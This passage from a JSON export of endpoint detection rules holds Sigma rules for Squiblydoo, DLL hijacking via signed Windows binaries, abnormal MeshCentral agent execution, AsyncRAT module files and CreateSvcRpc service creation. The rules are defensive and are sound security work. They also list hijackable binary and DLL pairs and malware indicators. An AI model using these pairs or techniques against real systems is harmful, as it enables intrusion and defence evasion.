"rule_level_override": null,
"rule_id": "9c113891-aff7-41d7-9b05-faa3ef67baf0",
"rule_name": "Possible Library Squiblydoo Attack Detected",
"rule_description": "Detects a renamed scrobj.dll being loaded by regsvr32, a technique also known as Squiblydoo.\nSquiblydoo is a specific usage of regsvr32 to load a COM scriptlet directly from the Internet and execute it in a way that bypasses application whitelisting.\nIt is recommended to investigate URLs in the command-line of the regsvr32 process, as well as network connections and other surrounding telemetries to determine if this action was legitimate.\n",
"rule_creation_date": "2021-03-31",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c3c82c3-639f-48aa-8b71-0226e015feec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076868Z",
"creation_date": "2026-03-23T11:45:34.076881Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076885Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vsgraphicsremoteengine.yml",
"content": "title: DLL Hijacking via vsgraphicsremoteengine.exe\nid: 9c3c82c3-639f-48aa-8b71-0226e015feec\ndescription: |\n Detects potential Windows DLL Hijacking via vsgraphicsremoteengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vsgraphicsremoteengine.exe'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\webservices.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c3c82c3-639f-48aa-8b71-0226e015feec",
"rule_name": "DLL Hijacking via vsgraphicsremoteengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vsgraphicsremoteengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c63e668-44a3-458f-973f-62af5e790af6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082942Z",
"creation_date": "2026-03-23T11:45:34.082944Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082948Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1558861977379868672",
"https://meshcentral.com/info/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_meshcentral_agent_execution.yml",
"content": "title: Abnormal MeshCentral Agent Execution\nid: 9c63e668-44a3-458f-973f-62af5e790af6\ndescription: |\n Detects the abnormal execution of a MeshCentral agent being executed on the target host.\n This rule detects MeshAgent being executed with a renamed executable or from an unconventional directory.\n MeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\n It is recommended to investigate the parent process for suspicious activities as well as to look for other malicious actions stemming from the installed MeshCentral agent.\nreferences:\n - https://twitter.com/malmoeb/status/1558861977379868672\n - https://meshcentral.com/info/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/10/06\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.MeshCentral\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessInternalName: 'MeshAgent'\n - ProcessDescription: 'Mesh Agent Service'\n - ProcessProduct: 'Mesh Agent Service'\n - ProcessSignatureSignerIssuerName|startswith: 'MeshCentralRoot-'\n\n filter_legitimate_path:\n Image|startswith:\n - '?:\\Program Files\\Mesh Agent\\'\n - '?:\\Program Files (x86)\\Mesh Agent\\'\n\n filter_legitimate_name:\n Image|endswith: '\\MeshAgent.exe'\n\n exclusion_tacticalrmm:\n ParentImage:\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files (x86)\\TacticalAgent\\tacticalrmm.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c63e668-44a3-458f-973f-62af5e790af6",
"rule_name": "Abnormal MeshCentral Agent Execution",
"rule_description": "Detects the abnormal execution of a MeshCentral agent being executed on the target host.\nThis rule detects MeshAgent being executed with a renamed executable or from an unconventional directory.\nMeshCentral is a remote host control tool that can be used maliciously as a Remote Access Tool (RAT).\nIt is recommended to investigate the parent process for suspicious activities as well as to look for other malicious actions stemming from the installed MeshCentral agent.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c6edfa4-db0e-4777-9bfb-0973b944d5bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590658Z",
"creation_date": "2026-03-23T11:45:34.590664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590676Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sigverif.yml",
"content": "title: DLL Hijacking via sigverif.exe\nid: 9c6edfa4-db0e-4777-9bfb-0973b944d5bc\ndescription: |\n Detects potential Windows DLL Hijacking via sigverif.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sigverif.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c6edfa4-db0e-4777-9bfb-0973b944d5bc",
"rule_name": "DLL Hijacking via sigverif.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sigverif.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9c8ee247-5c0d-4b48-b359-9c783295fa19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095607Z",
"creation_date": "2026-03-23T11:45:34.095609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_legacynetuxhost.yml",
"content": "title: DLL Hijacking via LegacyNetUXHost.exe\nid: 9c8ee247-5c0d-4b48-b359-9c783295fa19\ndescription: |\n Detects potential Windows DLL Hijacking via LegacyNetUXHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LegacyNetUXHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9c8ee247-5c0d-4b48-b359-9c783295fa19",
"rule_name": "DLL Hijacking via LegacyNetUXHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LegacyNetUXHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9cbee887-963e-4baf-92c7-ec0b87858928",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077655Z",
"creation_date": "2026-03-23T11:45:34.077657Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077661Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nlb.yml",
"content": "title: DLL Hijacking via NLB.exe\nid: 9cbee887-963e-4baf-92c7-ec0b87858928\ndescription: |\n Detects potential Windows DLL Hijacking via NLB.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NLB.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9cbee887-963e-4baf-92c7-ec0b87858928",
"rule_name": "DLL Hijacking via NLB.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NLB.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094289Z",
"creation_date": "2026-03-23T11:45:34.094291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094295Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_omadmrpc.yml",
"content": "title: DLL Hijacking via omadmrpc.exe\nid: 9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733\ndescription: |\n Detects potential Windows DLL Hijacking via omadmrpc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'omadmrpc.exe'\n ImageLoaded|endswith:\n - '\\dmpushproxy.dll'\n - '\\omadmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9cd94b9b-183d-4cc3-8f2c-9ef79bd7d733",
"rule_name": "DLL Hijacking via omadmrpc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via omadmrpc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ce1f97a-87d5-4750-9c6d-729163e4c865",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086306Z",
"creation_date": "2026-03-23T11:45:34.086308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
"https://twitter.com/malmoeb/status/1555926311738171398",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_asyncrat_data_collection_dlls.yml",
"content": "title: AsyncRAT Data Collection DLL Written to Disk\nid: 9ce1f97a-87d5-4750-9c6d-729163e4c865\ndescription: |\n Detects the creation of DLLs files associated with AsyncRAT that allows for various data collection abilities.\n AsyncRAT is an open-source C-sharp C2 that is usually the last piece of the infection chain.\n AsyncRAT loads modules by downloading DLLs from the C2 server and dropping them on the local system.\n It is recommended to check the DLL for malicious content and the processes creating/loading the DLL for other suspicious activities.\nreferences:\n - https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/\n - https://twitter.com/malmoeb/status/1555926311738171398\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/08/08\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Malware.AsyncRAT\n - classification.Windows.Behavior.Collection\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Chat.dll'\n - '?:\\Extra.dll'\n - '?:\\FileManager.dll'\n - '?:\\FileSearcher.dll'\n - '?:\\LimeLogger.dll'\n - '?:\\Miscellaneous.dll'\n - '?:\\Options.dll'\n - '?:\\ProcessManager.dll'\n - '?:\\Recovery.dll'\n - '?:\\RemoteCamera.dll'\n - '?:\\RemoteDesktop.dll'\n - '?:\\SendFile.dll'\n - '?:\\SendMemory.dll'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ce1f97a-87d5-4750-9c6d-729163e4c865",
"rule_name": "AsyncRAT Data Collection DLL Written to Disk",
"rule_description": "Detects the creation of DLLs files associated with AsyncRAT that allows for various data collection abilities.\nAsyncRAT is an open-source C-sharp C2 that is usually the last piece of the infection chain.\nAsyncRAT loads modules by downloading DLLs from the C2 server and dropping them on the local system.\nIt is recommended to check the DLL for malicious content and the processes creating/loading the DLL for other suspicious activities.\n",
"rule_creation_date": "2022-08-08",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9d004cbd-eea7-4a6c-a0ab-87f2313e82b9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599052Z",
"creation_date": "2026-03-23T11:45:34.599055Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599063Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.x86matthew.com/view_post?id=create_svc_rpc",
"https://attack.mitre.org/techniques/T1569/002"
],
"name": "t1569_002_createsvcrpc_default_service.yml",
"content": "title: CreateSvcRpc Service Installed\nid: 9d004cbd-eea7-4a6c-a0ab-87f2313e82b9\ndescription: |\n Detects the creation of the malicious CreateSvcRpc tool service.\n CreateSvcRpc is a tool that uses RPC to execute programs as the SYSTEM user, by creating a service.\n Adversaries can create services to elevate their privileges or achieve persistence.\n It is recommended to investigate the process responsible for the creation of this service and to look for other malicious activities on the host.\nreferences:\n - https://www.x86matthew.com/view_post?id=create_svc_rpc\n - https://attack.mitre.org/techniques/T1569/002\ndate: 2023/03/28\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName: 'CreateSvcRpc_*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9d004cbd-eea7-4a6c-a0ab-87f2313e82b9",
"rule_name": "CreateSvcRpc Service Installed",
